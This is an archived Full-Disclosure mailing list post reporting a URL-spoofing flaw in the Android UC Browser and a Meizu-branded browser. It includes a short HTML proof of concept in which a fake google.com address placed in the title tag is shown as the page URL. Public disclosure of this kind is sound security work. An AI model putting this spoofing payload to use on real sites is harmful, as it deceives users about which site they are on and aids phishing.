lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAN10O-afkamVP-zrB+mL9RV1VUK5eR29ydE7zTU23HuhOiRWZQ@mail.gmail.com>
Date: Sat, 11 Mar 2017 16:55:56 +1100
From: x ksi <s3810@...stk.edu.pl>
To: fulldisclosure@...lists.org
Subject: [FD] URL spoofing in UC browser.

Hey list. It's possible to spoof an URL in mobile versions (Android)
of the UC browser [1][2] via <title> HTML tags. The newest version
from gplay (11.2.5.932) and the Meizu [3][4] branded default browser
(6.1.301) are affected. And the shocking poc would be:

--
<html>
<head>
    <title>
        https://you_are_safe_here.google.com/
    </title>
    щ(゚Д゚щ
</head>
</html>
--

which results in http://s1m0n.dft-labs.eu/files/meizu/ .

References:
[1] https://en.wikipedia.org/wiki/UC_Browser
[2] http://www.ucweb.com/company/about/
[3] http://www.meizu.com/en/
[4] http://www.themobileindian.com/news/meizu-partners-with-uc-browser-12605

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ